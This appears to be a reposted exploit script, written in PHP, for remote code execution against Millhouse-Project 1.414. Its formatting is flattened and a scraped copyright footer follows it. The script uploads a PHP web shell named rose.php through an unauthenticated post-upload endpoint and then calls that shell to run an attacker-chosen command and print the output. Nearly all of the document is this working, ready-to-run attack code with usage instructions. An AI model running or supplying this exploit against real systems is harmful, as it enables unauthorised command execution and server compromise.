<?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("33[1;32m n Millhouse Remote Code Execution n Author: Chokri Hammedin n Usage : php exploit.php -u http://target.org/ -c whoaminn33[0mnn");$target = $options['u'];$command = $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array('Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8','Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "33[1;32m n".$exec_shell . "33[0mn n";?>
Source: 9300503202-BLW/eussi/moc.ytirucesxc
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
